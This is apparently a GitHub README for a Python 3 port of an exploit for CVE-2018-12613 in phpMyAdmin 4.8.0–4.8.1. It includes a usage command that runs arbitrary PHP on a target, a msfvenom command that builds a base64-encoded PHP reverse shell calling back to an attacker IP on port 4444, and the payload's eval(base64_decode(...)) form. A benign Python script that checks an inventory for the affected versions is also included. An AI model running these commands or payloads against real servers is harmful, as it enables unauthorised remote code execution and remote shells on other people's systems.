ivanitlearning / CVE-2018-12613

Modified standalone exploit ported for Python 3

CVE-2018-12613

Modified standalone exploit ported to Python 3. Tested on Python 3.7.3 against phpMyAdmin 4.8.1 running on Ubuntu 16.04. Works on Linux only. Original exploit by SSD. All credits to them.

Changes made

  1. Added function to exit if provided phpMyAdmin username/password is correct
  2. Added function to check if version is vulnerable (4.8.0 or 4.8.1)
  3. Converted variables to either bytes or strings strictly; Python 3 disallows mixing. See this.
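For defenders, the version test in item 2 can be turned around and run over an asset inventory. The following is an added example, not code from this repository: the function names and the inventory lines are constructed for illustration, and the affected set is only the two releases this page names.

```python
import re

# Releases this page names as vulnerable to CVE-2018-12613.
AFFECTED = {(4, 8, 0), (4, 8, 1)}

# Optional Debian-style epoch ("4:"), then exactly three numeric components.
# The lookarounds reject four-part strings such as "4.8.1.1" instead of
# silently truncating them to 4.8.1.
VERSION_RE = re.compile(r"(?<![\d.])(?:\d+:)?(\d+)\.(\d+)\.(\d+)(?!\.?\d)")

# Constructed sample inventory: "<host>, <version string as reported>".
SAMPLE_INVENTORY = [
    "web01, phpMyAdmin 4.8.1",
    "web02, 4:4.8.1-1",   # package-style epoch and revision
    "web03, 4.8.10",      # a substring test for "4.8.1" would misfire here
    "web04, 4.8.0",
    "web05, 4.8.2",
    "web06, 4.8",         # incomplete version string
]

def parse_version(text):
    """Return (major, minor, patch) or None if no full version is present."""
    m = VERSION_RE.search(text)
    return tuple(int(g) for g in m.groups()) if m else None

def classify(text):
    """Map a reported version string to affected / not-listed / unknown."""
    version = parse_version(text)
    if version is None:
        return "unknown"
    # A distribution package may carry a backported fix, so "affected"
    # means "review this host", not "confirmed vulnerable".
    return "affected" if version in AFFECTED else "not-listed"

def audit(inventory_lines):
    """Classify every inventory line; only the version field is parsed."""
    findings = []
    for line in inventory_lines:
        host, _, reported = line.partition(",")
        findings.append((host.strip(), reported.strip(), classify(reported)))
    return findings

if __name__ == "__main__":
    for host, reported, status in audit(SAMPLE_INVENTORY):
        print(f"{host:6} {reported:18} {status}")
```

Hosts reported as `unknown` need a manual check, since a missing or partial version string says nothing about exposure.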

Usage:

python3 CVE-2018-12613.py -u phpMyAdmin -p password -U http://[url-phpMyAdmin] -P "phpcredits();"

The output of the PHP code is stored in results.html.

For reverse shell

root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# msfvenom --platform php -a php -e php/base64 -p php/reverse_php LHOST=192.168.92.134 LPORT=4444 -o payload.php
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4045 (iteration=0)
php/base64 chosen with final size 4045
Payload size: 4045 bytes
Saved as: payload.php

Use the msfvenom php payload in place of phpcredits(); above

root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# cat payload.php

eval(base64_decode(ICAg...gfQo));
